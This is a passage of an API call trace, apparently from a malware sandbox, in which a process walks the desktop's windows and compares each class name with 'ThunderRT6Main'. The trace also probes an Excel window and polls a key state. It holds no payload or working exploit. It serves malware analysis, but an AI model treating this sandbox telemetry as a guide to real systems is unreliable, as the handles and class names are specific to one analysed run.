uCmd=0x2) returned 0x1017a [0218.295] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="romaniaUpgradewnd") returned 17 [0218.295] lstrcmpA (lpString1="romaniaUpgradewnd", lpString2="ThunderRT6Main") returned -1 [0218.295] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x768 [0218.295] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x1017c [0218.295] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.295] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.295] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x768 [0218.295] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x10176 [0218.295] GetClassNameA (in: hWnd=0x10176, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="remarks_class") returned 13 [0218.296] lstrcmpA (lpString1="remarks_class", lpString2="ThunderRT6Main") returned -1 [0218.296] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x56c [0218.296] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10178 [0218.296] GetClassNameA (in: hWnd=0x10178, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.296] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.296] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x56c [0218.296] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x10172 [0218.296] GetClassNameA (in: hWnd=0x10172, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tsunami_spas_Pit_win") returned 20 [0218.296] lstrcmpA (lpString1="tsunami_spas_Pit_win", lpString2="ThunderRT6Main") returned 1 [0218.296] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x520 [0218.296] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x10174 [0218.296] GetClassNameA (in: hWnd=0x10174, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.296] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.296] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x520 [0218.296] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x1016e [0218.296] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="slave_Development_Inclusion_class") returned 33 [0218.296] lstrcmpA (lpString1="slave_Development_Inclusion_class", lpString2="ThunderRT6Main") returned -1 [0218.296] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x564 [0218.296] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10170 [0218.296] GetClassNameA (in: hWnd=0x10170, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.296] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.296] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x564 [0218.296] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x1016a [0218.296] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="everysidescharacterswnd") returned 23 [0218.296] lstrcmpA (lpString1="everysidescharacterswnd", lpString2="ThunderRT6Main") returned -1 [0218.296] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x578 [0218.296] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x1016c [0218.297] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.297] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.297] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x578 [0218.297] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x10166 [0218.297] GetClassNameA (in: hWnd=0x10166, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="shades_innovation_win") returned 21 [0218.297] lstrcmpA (lpString1="shades_innovation_win", lpString2="ThunderRT6Main") returned -1 [0218.297] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x548 [0218.297] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10168 [0218.297] GetClassNameA (in: hWnd=0x10168, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.297] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.297] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x548 [0218.297] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x10162 [0218.297] GetClassNameA (in: hWnd=0x10162, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Lower_insights_gazette_win") returned 26 [0218.297] lstrcmpA (lpString1="Lower_insights_gazette_win", lpString2="ThunderRT6Main") returned -1 [0218.297] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x414 [0218.297] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x10164 [0218.297] GetClassNameA (in: hWnd=0x10164, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.297] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.297] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x414 [0218.297] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x1015e [0218.297] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Transcriptsaquaticpreviously") returned 28 [0218.297] lstrcmpA (lpString1="Transcriptsaquaticpreviously", lpString2="ThunderRT6Main") returned 1 [0218.297] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x514 [0218.297] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x10160 [0218.297] GetClassNameA (in: hWnd=0x10160, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.297] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.297] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x514 [0218.297] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x40152 [0218.298] GetClassNameA (in: hWnd=0x40152, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="eu_Spokesman_class") returned 18 [0218.298] lstrcmpA (lpString1="eu_Spokesman_class", lpString2="ThunderRT6Main") returned -1 [0218.298] GetWindowThreadProcessId (in: hWnd=0x40152, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x90 [0218.298] GetWindow (hWnd=0x40152, uCmd=0x2) returned 0x300fa [0218.298] GetClassNameA (in: hWnd=0x300fa, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.298] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.298] GetWindowThreadProcessId (in: hWnd=0x300fa, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x90 [0218.298] GetWindow (hWnd=0x300fa, uCmd=0x2) returned 0x80154 [0218.298] GetClassNameA (in: hWnd=0x80154, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="promise_wnd") returned 11 [0218.298] lstrcmpA (lpString1="promise_wnd", lpString2="ThunderRT6Main") returned -1 [0218.298] GetWindowThreadProcessId (in: hWnd=0x80154, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x528 [0218.298] GetWindow (hWnd=0x80154, uCmd=0x2) returned 0x40156 [0218.298] GetClassNameA (in: hWnd=0x40156, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.298] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.298] GetWindowThreadProcessId (in: hWnd=0x40156, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x528 [0218.298] GetWindow (hWnd=0x40156, uCmd=0x2) returned 0x30102 [0218.298] GetClassNameA (in: hWnd=0x30102, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="temperature_Developmental_Determine_win") returned 39 [0218.298] lstrcmpA (lpString1="temperature_Developmental_Determine_win", lpString2="ThunderRT6Main") returned -1 [0218.298] GetWindowThreadProcessId (in: hWnd=0x30102, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7fc [0218.298] GetWindow (hWnd=0x30102, uCmd=0x2) returned 0x70150 [0218.298] GetClassNameA (in: hWnd=0x70150, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.298] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.298] GetWindowThreadProcessId (in: hWnd=0x70150, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7fc [0218.298] GetWindow (hWnd=0x70150, uCmd=0x2) returned 0x3015a [0218.298] GetClassNameA (in: hWnd=0x3015a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0218.298] lstrcmpA (lpString1="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}", lpString2="ThunderRT6Main") returned -1 [0218.298] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x468 [0218.298] GetWindow (hWnd=0x3015a, uCmd=0x2) returned 0x10146 [0218.299] GetClassNameA (in: hWnd=0x10146, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0218.299] lstrcmpA (lpString1="BluetoothNotificationAreaIconWindowClass", lpString2="ThunderRT6Main") returned -1 [0218.299] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x50c [0218.299] GetWindow (hWnd=0x10146, uCmd=0x2) returned 0x10144 [0218.299] GetClassNameA (in: hWnd=0x10144, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0218.299] lstrcmpA (lpString1="MS_WebcheckMonitor", lpString2="ThunderRT6Main") returned -1 [0218.299] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x46c [0218.299] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x2013a [0218.299] GetClassNameA (in: hWnd=0x2013a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="PNIHiddenWnd") returned 12 [0218.299] lstrcmpA (lpString1="PNIHiddenWnd", lpString2="ThunderRT6Main") returned -1 [0218.299] GetWindowThreadProcessId (in: hWnd=0x2013a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x50c [0218.299] GetWindow (hWnd=0x2013a, uCmd=0x2) returned 0x1012e [0218.299] GetClassNameA (in: hWnd=0x1012e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Media Center SSO") returned 16 [0218.299] lstrcmpA (lpString1="Media Center SSO", lpString2="ThunderRT6Main") returned -1 [0218.299] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x46c [0218.299] GetWindow (hWnd=0x1012e, uCmd=0x2) returned 0x10130 [0218.299] GetClassNameA (in: hWnd=0x10130, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.299] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.299] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x46c [0218.299] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10124 [0218.299] GetClassNameA (in: hWnd=0x10124, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ATL:000007FEFBEA41F0") returned 20 [0218.299] lstrcmpA (lpString1="ATL:000007FEFBEA41F0", lpString2="ThunderRT6Main") returned -1 [0218.299] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x50c [0218.299] GetWindow (hWnd=0x10124, uCmd=0x2) returned 0x10126 [0218.299] GetClassNameA (in: hWnd=0x10126, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.299] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.299] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x50c [0218.299] GetWindow (hWnd=0x10126, uCmd=0x2) returned 0x10118 [0218.300] GetClassNameA (in: hWnd=0x10118, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="SystemTray_Main") returned 15 [0218.300] lstrcmpA (lpString1="SystemTray_Main", lpString2="ThunderRT6Main") returned -1 [0218.300] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x468 [0218.300] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x1011a [0218.300] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.300] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.300] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x468 [0218.300] GetWindow (hWnd=0x1011a, uCmd=0x2) returned 0x10116 [0218.300] GetClassNameA (in: hWnd=0x10116, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0218.300] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0218.300] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x468 [0218.300] GetWindow (hWnd=0x10116, uCmd=0x2) returned 0x20018 [0218.300] GetClassNameA (in: hWnd=0x20018, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="OneNoteM") returned 8 [0218.300] lstrcmpA (lpString1="OneNoteM", lpString2="ThunderRT6Main") returned -1 [0218.300] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x544 [0218.300] GetWindow (hWnd=0x20018, uCmd=0x2) returned 0x2001a [0218.300] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.300] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.300] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x544 [0218.300] GetWindow (hWnd=0x2001a, uCmd=0x2) returned 0x2001c [0218.300] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="GDI+ Hook Window Class") returned 22 [0218.300] lstrcmpA (lpString1="GDI+ Hook Window Class", lpString2="ThunderRT6Main") returned -1 [0218.300] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x76c [0218.300] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0218.300] GetClassNameA (in: hWnd=0x20016, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.300] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.300] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x76c [0218.300] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200a2 [0218.301] GetClassNameA (in: hWnd=0x200a2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0218.301] lstrcmpA (lpString1="TASKENGINEWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0218.301] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x584 [0218.301] GetWindow (hWnd=0x200a2, uCmd=0x2) returned 0x1010a [0218.301] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.301] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.301] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x584 [0218.301] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x10106 [0218.301] GetClassNameA (in: hWnd=0x10106, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0218.301] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0218.301] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x570 [0218.301] GetWindow (hWnd=0x10106, uCmd=0x2) returned 0x10104 [0218.301] GetClassNameA (in: hWnd=0x10104, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0218.301] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0218.301] GetWindowThreadProcessId (in: hWnd=0x10104, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x45c [0218.301] GetWindow (hWnd=0x10104, uCmd=0x2) returned 0x10100 [0218.301] GetClassNameA (in: hWnd=0x10100, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0218.301] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0218.301] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x45c [0218.301] GetWindow (hWnd=0x10100, uCmd=0x2) returned 0x100fe [0218.301] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0218.301] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0218.301] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x53c [0218.301] GetWindow (hWnd=0x100fe, uCmd=0x2) returned 0x5008e [0218.301] GetClassNameA (in: hWnd=0x5008e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="DV2ControlHost") returned 14 [0218.301] lstrcmpA (lpString1="DV2ControlHost", lpString2="ThunderRT6Main") returned -1 [0218.301] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.302] GetWindow (hWnd=0x5008e, uCmd=0x2) returned 0x10084 [0218.302] GetClassNameA (in: hWnd=0x10084, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0218.302] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0218.302] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x508 [0218.302] GetWindow (hWnd=0x10084, uCmd=0x2) returned 0x10082 [0218.302] GetClassNameA (in: hWnd=0x10082, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0218.302] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0218.302] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.302] GetWindow (hWnd=0x10082, uCmd=0x2) returned 0x1007a [0218.302] GetClassNameA (in: hWnd=0x1007a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.302] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.302] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.302] GetWindow (hWnd=0x1007a, uCmd=0x2) returned 0x10068 [0218.302] GetClassNameA (in: hWnd=0x10068, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.302] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.302] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.302] GetWindow (hWnd=0x10068, uCmd=0x2) returned 0x20020 [0218.302] GetClassNameA (in: hWnd=0x20020, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="#43") returned 3 [0218.302] lstrcmpA (lpString1="#43", lpString2="ThunderRT6Main") returned -1 [0218.302] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7ec [0218.302] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x20024 [0218.303] GetClassNameA (in: hWnd=0x20024, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.303] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.303] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7ec [0218.303] GetWindow (hWnd=0x20024, uCmd=0x2) returned 0x10064 [0218.303] GetClassNameA (in: hWnd=0x10064, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0218.303] lstrcmpA (lpString1="NotifyIconOverflowWindow", lpString2="ThunderRT6Main") returned -1 [0218.303] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.303] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10052 [0218.303] GetClassNameA (in: hWnd=0x10052, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0218.303] lstrcmpA (lpString1="COMTASKSWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0218.303] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4d8 [0218.303] GetWindow (hWnd=0x10052, uCmd=0x2) returned 0x10054 [0218.303] GetClassNameA (in: hWnd=0x10054, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.303] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.303] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4d8 [0218.303] GetWindow (hWnd=0x10054, uCmd=0x2) returned 0x1004c [0218.303] GetClassNameA (in: hWnd=0x1004c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0218.303] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0218.303] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.303] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10044 [0218.303] GetClassNameA (in: hWnd=0x10044, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="DDEMLEvent") returned 10 [0218.303] lstrcmpA (lpString1="DDEMLEvent", lpString2="ThunderRT6Main") returned -1 [0218.303] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x45c [0218.303] GetWindow (hWnd=0x10044, uCmd=0x2) returned 0x20040 [0218.303] GetClassNameA (in: hWnd=0x20040, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="DDEMLMom") returned 8 [0218.303] lstrcmpA (lpString1="DDEMLMom", lpString2="ThunderRT6Main") returned -1 [0218.303] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x45c [0218.304] GetWindow (hWnd=0x20040, uCmd=0x2) returned 0x10042 [0218.304] GetClassNameA (in: hWnd=0x10042, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.304] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.304] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x45c [0218.304] GetWindow (hWnd=0x10042, uCmd=0x2) returned 0x3003e [0218.304] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Dwm") returned 3 [0218.304] lstrcmpA (lpString1="Dwm", lpString2="ThunderRT6Main") returned -1 [0218.304] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x44c [0218.304] GetWindow (hWnd=0x3003e, uCmd=0x2) returned 0x2001e [0218.304] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.304] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.304] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7d4 [0218.304] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20022 [0218.304] GetClassNameA (in: hWnd=0x20022, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="CicLoaderWndClass") returned 17 [0218.304] lstrcmpA (lpString1="CicLoaderWndClass", lpString2="ThunderRT6Main") returned -1 [0218.304] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7d4 [0218.304] GetWindow (hWnd=0x20022, uCmd=0x2) returned 0x2020c [0218.304] GetClassNameA (in: hWnd=0x2020c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="XLMAIN") returned 6 [0218.304] lstrcmpA (lpString1="XLMAIN", lpString2="ThunderRT6Main") returned 1 [0218.304] GetWindowThreadProcessId (in: hWnd=0x2020c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.304] GetWindowLongA (hWnd=0x2020c, nIndex=-16) returned 131006464 [0218.304] GetWindowLongPtrA (hWnd=0x2020c, nIndex=-6) returned 0x13f7d0000 [0218.304] GetWindowLongPtrA (hWnd=0x2020c, nIndex=-6) returned 0x13f7d0000 [0218.304] GetWindow (hWnd=0x2020c, uCmd=0x2) returned 0x100ec [0218.304] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Progman") returned 7 [0218.304] lstrcmpA (lpString1="Progman", lpString2="ThunderRT6Main") returned -1 [0218.304] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x45c [0218.304] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x0 [0218.304] IMalloc:Alloc (This=0x7fefecb5380, cb=0x18) returned 0x7dcd860 [0218.348] IMalloc:Free (This=0x7fefecb5380, pv=0x7dcd860) [0218.585] GetAsyncKeyState (vKey=27) returned 0 [0218.585] GetCurrentThreadId () returned 0xae8 [0218.585] GetWindowLongA (hWnd=0x0, nIndex=-16) returned 0 [0218.585] GetDesktopWindow () returned 0x10010 [0218.585] GetWindow (hWnd=0x10010, uCmd=0x5) returned 0x300b0 [0218.585] GetClassNameA (in: hWnd=0x300b0, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.585] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.586] GetWindowThreadProcessId (in: hWnd=0x300b0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.586] GetWindow (hWnd=0x300b0, uCmd=0x2) returned 0x300d6 [0218.586] GetClassNameA (in: hWnd=0x300d6, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.586] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.586] GetWindowThreadProcessId (in: hWnd=0x300d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.586] GetWindow (hWnd=0x300d6, uCmd=0x2) returned 0x300c0 [0218.586] GetClassNameA (in: hWnd=0x300c0, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.586] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.586] GetWindowThreadProcessId (in: hWnd=0x300c0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.586] GetWindow (hWnd=0x300c0, uCmd=0x2) 